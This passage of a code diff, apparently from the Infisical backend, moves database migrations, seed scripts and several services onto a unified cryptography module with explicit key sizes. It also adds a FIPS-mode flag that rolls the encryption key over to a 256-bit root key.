       el.encryptedTokenReviewerJwt && el.tokenReviewerJwtIV && el.tokenReviewerJwtTag
-        ? decryptSymmetric({
+        ? crypto.encryption().symmetric().decrypt({
             key,
+            keySize: SymmetricKeySize.Bits256,
             // eslint-disable-next-line @typescript-eslint/ban-ts-comment
             // @ts-ignore This will be removed in next cycle so ignore the ts missing error
             iv: el.tokenReviewerJwtIV,
@@ -128,8 +135,9 @@ const reencryptIdentityK8sAuth = async (knex: Knex) => {
       // eslint-disable-next-line @typescript-eslint/ban-ts-comment
       // @ts-ignore This will be removed in next cycle so ignore the ts missing error
       el.encryptedCaCert && el.caCertIV && el.caCertTag
-        ? decryptSymmetric({
+        ? crypto.encryption().symmetric().decrypt({
             key,
+            keySize: SymmetricKeySize.Bits256,
             // eslint-disable-next-line @typescript-eslint/ban-ts-comment
             // @ts-ignore This will be removed in next cycle so ignore the ts missing error
             iv: el.caCertIV,

backend/src/db/migrations/20250210101842_identity-oidc-auth-to-kms.ts

@@ -1,10 +1,11 @@
 import { Knex } from "knex";
 
 import { inMemoryKeyStore } from "@app/keystore/memory";
-import { decryptSymmetric, infisicalSymmetricDecrypt } from "@app/lib/crypto/encryption";
+import { crypto, SymmetricKeySize } from "@app/lib/crypto/cryptography";
 import { selectAllTableCols } from "@app/lib/knex";
 import { initLogger } from "@app/lib/logger";
 import { KmsDataKey } from "@app/services/kms/kms-types";
+import { superAdminDALFactory } from "@app/services/super-admin/super-admin-dal";
 
 import { SecretKeyEncoding, TableName, TOrgBots } from "../schemas";
 import { getMigrationEnvConfig } from "./utils/env-config";
@@ -34,7 +35,9 @@ const reencryptIdentityOidcAuth = async (knex: Knex) => {
   }
 
   initLogger();
-  const envConfig = getMigrationEnvConfig();
+  const superAdminDAL = superAdminDALFactory(knex);
+  const envConfig = await getMigrationEnvConfig(superAdminDAL);
+
   const keyStore = inMemoryKeyStore();
   const { kmsService } = await getMigrationEncryptionServices({ envConfig, keyStore, db: knex });
   const orgEncryptionRingBuffer =
@@ -71,19 +74,24 @@ const reencryptIdentityOidcAuth = async (knex: Knex) => {
           );
           orgEncryptionRingBuffer.push(orgId, orgKmsService);
         }
-        const key = infisicalSymmetricDecrypt({
+
-          ciphertext: encryptedSymmetricKey,
+        const key = crypto
-          iv: symmetricKeyIV,
+          .encryption()
-          tag: symmetricKeyTag,
+          .symmetric()
-          keyEncoding: symmetricKeyKeyEncoding as SecretKeyEncoding
+          .decryptWithRootEncryptionKey({
-        });
+            ciphertext: encryptedSymmetricKey,
+            iv: symmetricKeyIV,
+            tag: symmetricKeyTag,
+            keyEncoding: symmetricKeyKeyEncoding as SecretKeyEncoding
+          });
 
         const decryptedCertificate =
           // eslint-disable-next-line @typescript-eslint/ban-ts-comment
           // @ts-ignore This will be removed in next cycle so ignore the ts missing error
           el.encryptedCaCert && el.caCertIV && el.caCertTag
-            ? decryptSymmetric({
+            ? crypto.encryption().symmetric().decrypt({
                 key,
+                keySize: SymmetricKeySize.Bits256,
                 // eslint-disable-next-line @typescript-eslint/ban-ts-comment
                 // @ts-ignore This will be removed in next cycle so ignore the ts missing error
                 iv: el.caCertIV,

backend/src/db/migrations/20250210101845_directory-config-to-kms.ts

@@ -1,10 +1,11 @@
 import { Knex } from "knex";
 
 import { inMemoryKeyStore } from "@app/keystore/memory";
-import { decryptSymmetric, infisicalSymmetricDecrypt } from "@app/lib/crypto/encryption";
+import { crypto, SymmetricKeySize } from "@app/lib/crypto/cryptography";
 import { selectAllTableCols } from "@app/lib/knex";
 import { initLogger } from "@app/lib/logger";
 import { KmsDataKey } from "@app/services/kms/kms-types";
+import { superAdminDALFactory } from "@app/services/super-admin/super-admin-dal";
 
 import { SecretKeyEncoding, TableName } from "../schemas";
 import { getMigrationEnvConfig } from "./utils/env-config";
@@ -27,7 +28,8 @@ const reencryptSamlConfig = async (knex: Knex) => {
   }
 
   initLogger();
-  const envConfig = getMigrationEnvConfig();
+  const superAdminDAL = superAdminDALFactory(knex);
+  const envConfig = await getMigrationEnvConfig(superAdminDAL);
   const keyStore = inMemoryKeyStore();
   const { kmsService } = await getMigrationEncryptionServices({ envConfig, keyStore, db: knex });
   const orgEncryptionRingBuffer =
@@ -58,19 +60,24 @@ const reencryptSamlConfig = async (knex: Knex) => {
           );
           orgEncryptionRingBuffer.push(el.orgId, orgKmsService);
         }
-        const key = infisicalSymmetricDecrypt({
+
-          ciphertext: encryptedSymmetricKey,
+        const key = crypto
-          iv: symmetricKeyIV,
+          .encryption()
-          tag: symmetricKeyTag,
+          .symmetric()
-          keyEncoding: symmetricKeyKeyEncoding as SecretKeyEncoding
+          .decryptWithRootEncryptionKey({
-        });
+            ciphertext: encryptedSymmetricKey,
+            iv: symmetricKeyIV,
+            tag: symmetricKeyTag,
+            keyEncoding: symmetricKeyKeyEncoding as SecretKeyEncoding
+          });
 
         const decryptedEntryPoint =
           // eslint-disable-next-line @typescript-eslint/ban-ts-comment
           // @ts-ignore This will be removed in next cycle so ignore the ts missing error
           el.encryptedEntryPoint && el.entryPointIV && el.entryPointTag
-            ? decryptSymmetric({
+            ? crypto.encryption().symmetric().decrypt({
                 key,
+                keySize: SymmetricKeySize.Bits256,
                 // eslint-disable-next-line @typescript-eslint/ban-ts-comment
                 // @ts-ignore This will be removed in next cycle so ignore the ts missing error
                 iv: el.entryPointIV,
@@ -87,8 +94,9 @@ const reencryptSamlConfig = async (knex: Knex) => {
           // eslint-disable-next-line @typescript-eslint/ban-ts-comment
           // @ts-ignore This will be removed in next cycle so ignore the ts missing error
           el.encryptedIssuer && el.issuerIV && el.issuerTag
-            ? decryptSymmetric({
+            ? crypto.encryption().symmetric().decrypt({
                 key,
+                keySize: SymmetricKeySize.Bits256,
                 // eslint-disable-next-line @typescript-eslint/ban-ts-comment
                 // @ts-ignore This will be removed in next cycle so ignore the ts missing error
                 iv: el.issuerIV,
@@ -105,8 +113,9 @@ const reencryptSamlConfig = async (knex: Knex) => {
           // eslint-disable-next-line @typescript-eslint/ban-ts-comment
           // @ts-ignore This will be removed in next cycle so ignore the ts missing error
           el.encryptedCert && el.certIV && el.certTag
-            ? decryptSymmetric({
+            ? crypto.encryption().symmetric().decrypt({
                 key,
+                keySize: SymmetricKeySize.Bits256,
                 // eslint-disable-next-line @typescript-eslint/ban-ts-comment
                 // @ts-ignore This will be removed in next cycle so ignore the ts missing error
                 iv: el.certIV,
@@ -185,7 +194,8 @@ const reencryptLdapConfig = async (knex: Knex) => {
   }
 
   initLogger();
-  const envConfig = getMigrationEnvConfig();
+  const superAdminDAL = superAdminDALFactory(knex);
+  const envConfig = await getMigrationEnvConfig(superAdminDAL);
   const keyStore = inMemoryKeyStore();
   const { kmsService } = await getMigrationEncryptionServices({ envConfig, keyStore, db: knex });
   const orgEncryptionRingBuffer =
@@ -216,19 +226,24 @@ const reencryptLdapConfig = async (knex: Knex) => {
           );
           orgEncryptionRingBuffer.push(el.orgId, orgKmsService);
         }
-        const key = infisicalSymmetricDecrypt({
+
-          ciphertext: encryptedSymmetricKey,
+        const key = crypto
-          iv: symmetricKeyIV,
+          .encryption()
-          tag: symmetricKeyTag,
+          .symmetric()
-          keyEncoding: symmetricKeyKeyEncoding as SecretKeyEncoding
+          .decryptWithRootEncryptionKey({
-        });
+            ciphertext: encryptedSymmetricKey,
+            iv: symmetricKeyIV,
+            tag: symmetricKeyTag,
+            keyEncoding: symmetricKeyKeyEncoding as SecretKeyEncoding
+          });
 
         const decryptedBindDN =
           // eslint-disable-next-line @typescript-eslint/ban-ts-comment
           // @ts-ignore This will be removed in next cycle so ignore the ts missing error
           el.encryptedBindDN && el.bindDNIV && el.bindDNTag
-            ? decryptSymmetric({
+            ? crypto.encryption().symmetric().decrypt({
                 key,
+                keySize: SymmetricKeySize.Bits256,
                 // eslint-disable-next-line @typescript-eslint/ban-ts-comment
                 // @ts-ignore This will be removed in next cycle so ignore the ts missing error
                 iv: el.bindDNIV,
@@ -245,8 +260,9 @@ const reencryptLdapConfig = async (knex: Knex) => {
           // eslint-disable-next-line @typescript-eslint/ban-ts-comment
           // @ts-ignore This will be removed in next cycle so ignore the ts missing error
           el.encryptedBindPass && el.bindPassIV && el.bindPassTag
-            ? decryptSymmetric({
+            ? crypto.encryption().symmetric().decrypt({
                 key,
+                keySize: SymmetricKeySize.Bits256,
                 // eslint-disable-next-line @typescript-eslint/ban-ts-comment
                 // @ts-ignore This will be removed in next cycle so ignore the ts missing error
                 iv: el.bindPassIV,
@@ -263,8 +279,9 @@ const reencryptLdapConfig = async (knex: Knex) => {
           // eslint-disable-next-line @typescript-eslint/ban-ts-comment
           // @ts-ignore This will be removed in next cycle so ignore the ts missing error
           el.encryptedCACert && el.caCertIV && el.caCertTag
-            ? decryptSymmetric({
+            ? crypto.encryption().symmetric().decrypt({
                 key,
+                keySize: SymmetricKeySize.Bits256,
                 // eslint-disable-next-line @typescript-eslint/ban-ts-comment
                 // @ts-ignore This will be removed in next cycle so ignore the ts missing error
                 iv: el.caCertIV,
@@ -337,7 +354,8 @@ const reencryptOidcConfig = async (knex: Knex) => {
   }
 
   initLogger();
-  const envConfig = getMigrationEnvConfig();
+  const superAdminDAL = superAdminDALFactory(knex);
+  const envConfig = await getMigrationEnvConfig(superAdminDAL);
   const keyStore = inMemoryKeyStore();
   const { kmsService } = await getMigrationEncryptionServices({ envConfig, keyStore, db: knex });
   const orgEncryptionRingBuffer =
@@ -368,19 +386,24 @@ const reencryptOidcConfig = async (knex: Knex) => {
           );
           orgEncryptionRingBuffer.push(el.orgId, orgKmsService);
         }
-        const key = infisicalSymmetricDecrypt({
+
-          ciphertext: encryptedSymmetricKey,
+        const key = crypto
-          iv: symmetricKeyIV,
+          .encryption()
-          tag: symmetricKeyTag,
+          .symmetric()
-          keyEncoding: symmetricKeyKeyEncoding as SecretKeyEncoding
+          .decryptWithRootEncryptionKey({
-        });
+            ciphertext: encryptedSymmetricKey,
+            iv: symmetricKeyIV,
+            tag: symmetricKeyTag,
+            keyEncoding: symmetricKeyKeyEncoding as SecretKeyEncoding
+          });
 
         const decryptedClientId =
           // eslint-disable-next-line @typescript-eslint/ban-ts-comment
           // @ts-ignore This will be removed in next cycle so ignore the ts missing error
           el.encryptedClientId && el.clientIdIV && el.clientIdTag
-            ? decryptSymmetric({
+            ? crypto.encryption().symmetric().decrypt({
                 key,
+                keySize: SymmetricKeySize.Bits256,
                 // eslint-disable-next-line @typescript-eslint/ban-ts-comment
                 // @ts-ignore This will be removed in next cycle so ignore the ts missing error
                 iv: el.clientIdIV,
@@ -397,8 +420,9 @@ const reencryptOidcConfig = async (knex: Knex) => {
           // eslint-disable-next-line @typescript-eslint/ban-ts-comment
           // @ts-ignore This will be removed in next cycle so ignore the ts missing error
           el.encryptedClientSecret && el.clientSecretIV && el.clientSecretTag
-            ? decryptSymmetric({
+            ? crypto.encryption().symmetric().decrypt({
                 key,
+                keySize: SymmetricKeySize.Bits256,
                 // eslint-disable-next-line @typescript-eslint/ban-ts-comment
                 // @ts-ignore This will be removed in next cycle so ignore the ts missing error
                 iv: el.clientSecretIV,

backend/src/db/migrations/20250513081738_remove-gateway-project-link.ts

@@ -4,6 +4,7 @@ import { inMemoryKeyStore } from "@app/keystore/memory";
 import { selectAllTableCols } from "@app/lib/knex";
 import { initLogger } from "@app/lib/logger";
 import { KmsDataKey } from "@app/services/kms/kms-types";
+import { superAdminDALFactory } from "@app/services/super-admin/super-admin-dal";
 
 import { TableName } from "../schemas";
 import { getMigrationEnvConfig } from "./utils/env-config";
@@ -39,7 +40,8 @@ export async function up(knex: Knex): Promise<void> {
       );
 
     initLogger();
-    const envConfig = getMigrationEnvConfig();
+    const superAdminDAL = superAdminDALFactory(knex);
+    const envConfig = await getMigrationEnvConfig(superAdminDAL);
     const keyStore = inMemoryKeyStore();
     const { kmsService } = await getMigrationEncryptionServices({ envConfig, keyStore, db: knex });
 

backend/src/db/migrations/20250602155451_fix-secret-versions.ts

@@ -3,11 +3,12 @@ import { Knex } from "knex";
 
 import { chunkArray } from "@app/lib/fn";
 import { selectAllTableCols } from "@app/lib/knex";
-import { logger } from "@app/lib/logger";
+import { initLogger, logger } from "@app/lib/logger";
 
 import { SecretType, TableName } from "../schemas";
 
 export async function up(knex: Knex): Promise<void> {
+  initLogger();
   logger.info("Starting secret version fix migration");
 
   // Get all shared secret IDs first to optimize versions query
@@ -133,6 +134,7 @@ export async function up(knex: Knex): Promise<void> {
 }
 
 export async function down(): Promise<void> {
+  initLogger();
   logger.info("Rollback not implemented for secret version fix migration");
   // Note: Rolling back this migration would be complex and potentially destructive
   // as it would require tracking which version entries were added

backend/src/db/migrations/20250705074703_fips-mode.ts

@@ -0,0 +1,23 @@
+import { Knex } from "knex";
+
+import { TableName } from "../schemas";
+
+export async function up(knex: Knex): Promise<void> {
+  const hasFipsModeColumn = await knex.schema.hasColumn(TableName.SuperAdmin, "fipsEnabled");
+
+  if (!hasFipsModeColumn) {
+    await knex.schema.alterTable(TableName.SuperAdmin, (table) => {
+      table.boolean("fipsEnabled").notNullable().defaultTo(false);
+    });
+  }
+}
+
+export async function down(knex: Knex): Promise<void> {
+  const hasFipsModeColumn = await knex.schema.hasColumn(TableName.SuperAdmin, "fipsEnabled");
+
+  if (hasFipsModeColumn) {
+    await knex.schema.alterTable(TableName.SuperAdmin, (table) => {
+      table.dropColumn("fipsEnabled");
+    });
+  }
+}

backend/src/db/migrations/20250711005900_github-app-connection-to-environments.ts

@@ -2,6 +2,7 @@ import { Knex } from "knex";
 
 import { inMemoryKeyStore } from "@app/keystore/memory";
 import { selectAllTableCols } from "@app/lib/knex";
+import { superAdminDALFactory } from "@app/services/super-admin/super-admin-dal";
 
 import { TableName } from "../schemas";
 import { getMigrationEnvConfig } from "./utils/env-config";
@@ -12,7 +13,8 @@ export async function up(knex: Knex) {
     .select(selectAllTableCols(TableName.SuperAdmin))
     .whereNotNull(`${TableName.SuperAdmin}.encryptedGitHubAppConnectionClientId`);
 
-  const envConfig = getMigrationEnvConfig();
+  const superAdminDAL = superAdminDALFactory(knex);
+  const envConfig = await getMigrationEnvConfig(superAdminDAL);
   const keyStore = inMemoryKeyStore();
   const { kmsService } = await getMigrationEncryptionServices({ envConfig, keyStore, db: knex });
 

backend/src/db/migrations/utils/env-config.ts

@@ -1,6 +1,8 @@
 import { z } from "zod";
 
+import { crypto } from "@app/lib/crypto/cryptography";
 import { zpStr } from "@app/lib/zod";
+import { TSuperAdminDALFactory } from "@app/services/super-admin/super-admin-dal";
 
 const envSchema = z
   .object({
@@ -35,7 +37,7 @@ const envSchema = z
 
 export type TMigrationEnvConfig = z.infer<typeof envSchema>;
 
-export const getMigrationEnvConfig = () => {
+export const getMigrationEnvConfig = async (superAdminDAL: TSuperAdminDALFactory) => {
   const parsedEnv = envSchema.safeParse(process.env);
   if (!parsedEnv.success) {
     // eslint-disable-next-line no-console
@@ -49,5 +51,24 @@ export const getMigrationEnvConfig = () => {
     process.exit(-1);
   }
 
-  return Object.freeze(parsedEnv.data);
+  let envCfg = Object.freeze(parsedEnv.data);
+
+  const fipsEnabled = await crypto.initialize(superAdminDAL);
+
+  // Fix for 128-bit entropy encryption key expansion issue:
+  // In FIPS it is not ideal to expand a 128-bit key into 256-bit. We solved this issue in the past by creating the ROOT_ENCRYPTION_KEY.
+  // If FIPS mode is enabled, we set the value of ROOT_ENCRYPTION_KEY to the value of ENCRYPTION_KEY.
+  // ROOT_ENCRYPTION_KEY is expected to be a 256-bit base64-encoded key, unlike the 32-byte key of ENCRYPTION_KEY.
+  // When ROOT_ENCRYPTION_KEY is set, our cryptography will always use a 256-bit entropy encryption key. So for the sake of FIPS we should just roll over the value of ENCRYPTION_KEY to ROOT_ENCRYPTION_KEY.
+  if (fipsEnabled) {
+    const newEnvCfg = {
+      ...envCfg,
+      ROOT_ENCRYPTION_KEY: envCfg.ENCRYPTION_KEY
+    };
+    delete newEnvCfg.ENCRYPTION_KEY;
+
+    envCfg = Object.freeze(newEnvCfg);
+  }
+
+  return envCfg;
 };

backend/src/db/schemas/super-admin.ts

@@ -35,7 +35,8 @@ export const SuperAdminSchema = z.object({
   encryptedGitHubAppConnectionSlug: zodBuffer.nullable().optional(),
   encryptedGitHubAppConnectionId: zodBuffer.nullable().optional(),
   encryptedGitHubAppConnectionPrivateKey: zodBuffer.nullable().optional(),
-  encryptedEnvOverrides: zodBuffer.nullable().optional()
+  encryptedEnvOverrides: zodBuffer.nullable().optional(),
+  fipsEnabled: z.boolean().default(false)
 });
 
 export type TSuperAdmin = z.infer<typeof SuperAdminSchema>;

backend/src/db/seed-data.ts

@@ -1,18 +1,8 @@
 /* eslint-disable import/no-mutable-exports */
-import crypto from "node:crypto";
-
 import argon2, { argon2id } from "argon2";
 import jsrp from "jsrp";
-import nacl from "tweetnacl";
-import { encodeBase64 } from "tweetnacl-util";
 
-import {
+import { crypto, SymmetricKeySize } from "@app/lib/crypto/cryptography";
-  decryptAsymmetric,
-  // decryptAsymmetric,
-  decryptSymmetric128BitHexKeyUTF8,
-  encryptAsymmetric,
-  encryptSymmetric128BitHexKeyUTF8
-} from "@app/lib/crypto";
 
 import { TSecrets, TUserEncryptionKeys } from "./schemas";
 
@@ -62,11 +52,7 @@ export const seedData1 = {
 };
 
 export const generateUserSrpKeys = async (password: string) => {
-  const pair = nacl.box.keyPair();
+  const { publicKey, privateKey } = await crypto.encryption().asymmetric().generateKeyPair();
-  const secretKeyUint8Array = pair.secretKey;
-  const publicKeyUint8Array = pair.publicKey;
-  const privateKey = encodeBase64(secretKeyUint8Array);
-  const publicKey = encodeBase64(publicKeyUint8Array);
 
   // eslint-disable-next-line
   const client = new jsrp.client();
@@ -98,7 +84,11 @@ export const generateUserSrpKeys = async (password: string) => {
     ciphertext: encryptedPrivateKey,
     iv: encryptedPrivateKeyIV,
     tag: encryptedPrivateKeyTag
-  } = encryptSymmetric128BitHexKeyUTF8(privateKey, key);
+  } = crypto.encryption().symmetric().encrypt({
+    plaintext: privateKey,
+    key,
+    keySize: SymmetricKeySize.Bits128
+  });
 
   // create the protected key by encrypting the symmetric key
   // [key] with the derived key
@@ -106,7 +96,10 @@ export const generateUserSrpKeys = async (password: string) => {
     ciphertext: protectedKey,
     iv: protectedKeyIV,
     tag: protectedKeyTag
-  } = encryptSymmetric128BitHexKeyUTF8(key.toString("hex"), derivedKey);
+  } = crypto
+    .encryption()
+    .symmetric()
+    .encrypt({ plaintext: key.toString("hex"), key: derivedKey, keySize: SymmetricKeySize.Bits128 });
 
   return {
     protectedKey,
@@ -133,30 +126,38 @@ export const getUserPrivateKey = async (password: string, user: TUserEncryptionK
   });
   if (!derivedKey) throw new Error("Failed to derive key from password");
 
-  const key = decryptSymmetric128BitHexKeyUTF8({
+  const key = crypto
-    ciphertext: user.protectedKey as string,
+    .encryption()
-    iv: user.protectedKeyIV as string,
+    .symmetric()
-    tag: user.protectedKeyTag as string,
+    .decrypt({
-    key: derivedKey
+      ciphertext: user.protectedKey as string,
-  });
+      iv: user.protectedKeyIV as string,
+      tag: user.protectedKeyTag as string,
+      key: derivedKey,
+      keySize: SymmetricKeySize.Bits128
+    });
 
-  const privateKey = decryptSymmetric128BitHexKeyUTF8({
+  const privateKey = crypto
-    ciphertext: user.encryptedPrivateKey,
+    .encryption()
-    iv: user.iv,
+    .symmetric()
-    tag: user.tag,
+    .decrypt({
-    key: Buffer.from(key, "hex")
+      ciphertext: user.encryptedPrivateKey,
-  });
+      iv: user.iv,
+      tag: user.tag,
+      key: Buffer.from(key, "hex"),
+      keySize: SymmetricKeySize.Bits128
+    });
   return privateKey;
 };
 
 export const buildUserProjectKey = (privateKey: string, publickey: string) => {
   const randomBytes = crypto.randomBytes(16).toString("hex");
-  const { nonce, ciphertext } = encryptAsymmetric(randomBytes, publickey, privateKey);
+  const { nonce, ciphertext } = crypto.encryption().asymmetric().encrypt(randomBytes, publickey, privateKey);
   return { nonce, ciphertext };
 };
 
 export const getUserProjectKey = async (privateKey: string, ciphertext: string, nonce: string, publicKey: string) => {
-  return decryptAsymmetric({
+  return crypto.encryption().asymmetric().decrypt({
     ciphertext,
     nonce,
     publicKey,
@@ -170,21 +171,39 @@ export const encryptSecret = (encKey: string, key: string, value?: string, comme
     ciphertext: secretKeyCiphertext,
     iv: secretKeyIV,
     tag: secretKeyTag
-  } = encryptSymmetric128BitHexKeyUTF8(key, encKey);
+  } = crypto.encryption().symmetric().encrypt({
+    plaintext: key,
+    key: encKey,
+    keySize: SymmetricKeySize.Bits128
+  });
 
   // encrypt value
   const {
     ciphertext: secretValueCiphertext,
     iv: secretValueIV,
     tag: secretValueTag
-  } = encryptSymmetric128BitHexKeyUTF8(value ?? "", encKey);
+  } = crypto
+    .encryption()
+    .symmetric()
+    .encrypt({
+      plaintext: value ?? "",
+      key: encKey,
+      keySize: SymmetricKeySize.Bits128
+    });
 
   // encrypt comment
   const {
     ciphertext: secretCommentCiphertext,
     iv: secretCommentIV,
     tag: secretCommentTag
-  } = encryptSymmetric128BitHexKeyUTF8(comment ?? "", encKey);
+  } = crypto
+    .encryption()
+    .symmetric()
+    .encrypt({
+      plaintext: comment ?? "",
+      key: encKey,
+      keySize: SymmetricKeySize.Bits128
+    });
 
   return {
     secretKeyCiphertext,
@@ -200,27 +219,30 @@ export const encryptSecret = (encKey: string, key: string, value?: string, comme
 };
 
 export const decryptSecret = (decryptKey: string, encSecret: TSecrets) => {
-  const secretKey = decryptSymmetric128BitHexKeyUTF8({
+  const secretKey = crypto.encryption().symmetric().decrypt({
     key: decryptKey,
     ciphertext: encSecret.secretKeyCiphertext,
     tag: encSecret.secretKeyTag,
-    iv: encSecret.secretKeyIV
+    iv: encSecret.secretKeyIV,
+    keySize: SymmetricKeySize.Bits128
   });
 
-  const secretValue = decryptSymmetric128BitHexKeyUTF8({
+  const secretValue = crypto.encryption().symmetric().decrypt({
     key: decryptKey,
     ciphertext: encSecret.secretValueCiphertext,
     tag: encSecret.secretValueTag,
-    iv: encSecret.secretValueIV
+    iv: encSecret.secretValueIV,
+    keySize: SymmetricKeySize.Bits128
   });
 
   const secretComment =
     encSecret.secretCommentIV && encSecret.secretCommentTag && encSecret.secretCommentCiphertext
-      ? decryptSymmetric128BitHexKeyUTF8({
+      ? crypto.encryption().symmetric().decrypt({
           key: decryptKey,
           ciphertext: encSecret.secretCommentCiphertext,
           tag: encSecret.secretCommentTag,
-          iv: encSecret.secretCommentIV
+          iv: encSecret.secretCommentIV,
+          keySize: SymmetricKeySize.Bits128
         })
       : "";
 

backend/src/db/seeds/1-user.ts

@@ -1,5 +1,9 @@
 import { Knex } from "knex";
 
+import { crypto } from "@app/lib/crypto";
+import { initLogger } from "@app/lib/logger";
+import { superAdminDALFactory } from "@app/services/super-admin/super-admin-dal";
+
 import { AuthMethod } from "../../services/auth/auth-type";
 import { TableName } from "../schemas";
 import { generateUserSrpKeys, seedData1 } from "../seed-data";
@@ -10,6 +14,11 @@ export async function seed(knex: Knex): Promise<void> {
   await knex(TableName.UserEncryptionKey).del();
   await knex(TableName.SuperAdmin).del();
 
+  initLogger();
+
+  const superAdminDAL = superAdminDALFactory(knex);
+  await crypto.initialize(superAdminDAL);
+
   await knex(TableName.SuperAdmin).insert([
     // eslint-disable-next-line
     // @ts-ignore

backend/src/db/seeds/3-project.ts

@@ -1,8 +1,6 @@
-import crypto from "node:crypto";
-
 import { Knex } from "knex";
 
-import { encryptSymmetric128BitHexKeyUTF8 } from "@app/lib/crypto";
+import { crypto, SymmetricKeySize } from "@app/lib/crypto/cryptography";
 
 import { ProjectMembershipRole, ProjectType, SecretEncryptionAlgo, SecretKeyEncoding, TableName } from "../schemas";
 import { buildUserProjectKey, getUserPrivateKey, seedData1 } from "../seed-data";
@@ -72,7 +70,11 @@ export async function seed(knex: Knex): Promise<void> {
   const encKey = process.env.ENCRYPTION_KEY;
   if (!encKey) throw new Error("Missing ENCRYPTION_KEY");
   const salt = crypto.randomBytes(16).toString("base64");
-  const secretBlindIndex = encryptSymmetric128BitHexKeyUTF8(salt, encKey);
+  const secretBlindIndex = crypto.encryption().symmetric().encrypt({
+    plaintext: salt,
+    key: encKey,
+    keySize: SymmetricKeySize.Bits128
+  });
   // insert secret blind index for project
   await knex(TableName.SecretBlindIndex).insert({
     projectId: project.id,

backend/src/db/seeds/5-machine-identity.ts

@@ -1,6 +1,7 @@
-import bcrypt from "bcrypt";
 import { Knex } from "knex";
 
+import { crypto } from "@app/lib/crypto/cryptography";
+
 import { IdentityAuthMethod, OrgMembershipRole, ProjectMembershipRole, TableName } from "../schemas";
 import { seedData1 } from "../seed-data";
 
@@ -54,7 +55,9 @@ export async function seed(knex: Knex): Promise<void> {
       }
     ])
     .returning("*");
-  const clientSecretHash = await bcrypt.hash(seedData1.machineIdentity.clientCredentials.secret, 10);
+
+  const clientSecretHash = await crypto.hashing().createHash(seedData1.machineIdentity.clientCredentials.secret, 10);
+
   await knex(TableName.IdentityUaClientSecret).insert([
     {
       identityUAId: identityUa[0].id,

backend/src/ee/routes/est/certificate-est-router.ts

@@ -1,7 +1,7 @@
-import bcrypt from "bcrypt";
 import { z } from "zod";
 
 import { getConfig } from "@app/lib/config/env";
+import { crypto } from "@app/lib/crypto/cryptography";
 import { BadRequestError, UnauthorizedError } from "@app/lib/errors";
 import { readLimit, writeLimit } from "@app/server/config/rateLimiter";
 
@@ -85,7 +85,7 @@ export const registerCertificateEstRouter = async (server: FastifyZodProvider) =
       });
     }
 
-    const isPasswordValid = await bcrypt.compare(password, estConfig.hashedPassphrase);
+    const isPasswordValid = await crypto.hashing().compareHash(password, estConfig.hashedPassphrase);
     if (!isPasswordValid) {
       throw new UnauthorizedError({
         message: "Invalid credentials"

backend/src/ee/services/assume-privilege/assume-privilege-service.ts

@@ -1,7 +1,7 @@
 import { ForbiddenError } from "@casl/ability";
-import jwt from "jsonwebtoken";
 
 import { getConfig } from "@app/lib/config/env";
+import { crypto } from "@app/lib/crypto/cryptography";
 import { ForbiddenRequestError, NotFoundError } from "@app/lib/errors";
 import { ActorType } from "@app/services/auth/auth-type";
 import { TProjectDALFactory } from "@app/services/project/project-dal";
@@ -62,7 +62,7 @@ export const assumePrivilegeServiceFactory = ({
     });
 
     const appCfg = getConfig();
-    const assumePrivilegesToken = jwt.sign(
+    const assumePrivilegesToken = crypto.jwt().sign(
       {
         tokenVersionId,
         actorType: targetActorType,
@@ -82,7 +82,7 @@ export const assumePrivilegeServiceFactory = ({
     tokenVersionId
   ) => {
     const appCfg = getConfig();
-    const decodedToken = jwt.verify(token, appCfg.AUTH_SECRET) as {
+    const decodedToken = crypto.jwt().verify(token, appCfg.AUTH_SECRET) as {
       tokenVersionId: string;
       projectId: string;
       requesterId: string;

backend/src/ee/services/audit-log-stream/audit-log-stream-service.ts

@@ -4,7 +4,7 @@ import { RawAxiosRequestHeaders } from "axios";
 import { SecretKeyEncoding } from "@app/db/schemas";
 import { getConfig } from "@app/lib/config/env";
 import { request } from "@app/lib/config/request";
-import { infisicalSymmetricDecrypt, infisicalSymmetricEncypt } from "@app/lib/crypto/encryption";
+import { crypto } from "@app/lib/crypto/cryptography";
 import { BadRequestError, NotFoundError, UnauthorizedError } from "@app/lib/errors";
 import { blockLocalAndPrivateIpAddresses } from "@app/lib/validator";
 
@@ -86,7 +86,10 @@ export const auditLogStreamServiceFactory = ({
       .catch((err) => {
         throw new BadRequestError({ message: `Failed to connect with upstream source: ${(err as Error)?.message}` });
       });
-    const encryptedHeaders = headers ? infisicalSymmetricEncypt(JSON.stringify(headers)) : undefined;
+
+    const encryptedHeaders = headers
+      ? crypto.encryption().symmetric().encryptWithRootEncryptionKey(JSON.stringify(headers))
+      : undefined;
     const logStream = await auditLogStreamDAL.create({
       orgId: actorOrgId,
       url,
@@ -152,7 +155,9 @@ export const auditLogStreamServiceFactory = ({
         throw new Error(`Failed to connect with the source ${(err as Error)?.message}`);
       });
 
-    const encryptedHeaders = headers ? infisicalSymmetricEncypt(JSON.stringify(headers)) : undefined;
+    const encryptedHeaders = headers
+      ? crypto.encryption().symmetric().encryptWithRootEncryptionKey(JSON.stringify(headers))
+      : undefined;
     const updatedLogStream = await auditLogStreamDAL.updateById(id, {
       url,
       ...(encryptedHeaders
@@ -205,12 +210,15 @@ export const auditLogStreamServiceFactory = ({
     const headers =
       logStream?.encryptedHeadersCiphertext && logStream?.encryptedHeadersIV && logStream?.encryptedHeadersTag
         ? (JSON.parse(
-            infisicalSymmetricDecrypt({
+            crypto
-              tag: logStream.encryptedHeadersTag,
+              .encryption()
-              iv: logStream.encryptedHeadersIV,
+              .symmetric()
-              ciphertext: logStream.encryptedHeadersCiphertext,
+              .decryptWithRootEncryptionKey({
-              keyEncoding: logStream.encryptedHeadersKeyEncoding as SecretKeyEncoding
+                tag: logStream.encryptedHeadersTag,
-            })
+                iv: logStream.encryptedHeadersIV,
+                ciphertext: logStream.encryptedHeadersCiphertext,
+                keyEncoding: logStream.encryptedHeadersKeyEncoding as SecretKeyEncoding
+              })
           ) as LogStreamHeaders[])
         : undefined;
 

backend/src/ee/services/audit-log/audit-log-queue.ts

@@ -3,7 +3,7 @@ import { AxiosError, RawAxiosRequestHeaders } from "axios";
 import { SecretKeyEncoding } from "@app/db/schemas";
 import { getConfig } from "@app/lib/config/env";
 import { request } from "@app/lib/config/request";
-import { infisicalSymmetricDecrypt } from "@app/lib/crypto/encryption";
+import { crypto } from "@app/lib/crypto/cryptography";
 import { logger } from "@app/lib/logger";
 import { QueueJobs, QueueName, TQueueServiceFactory } from "@app/queue";
 import { TProjectDALFactory } from "@app/services/project/project-dal";
@@ -114,12 +114,15 @@ export const auditLogQueueServiceFactory = async ({
               const streamHeaders =
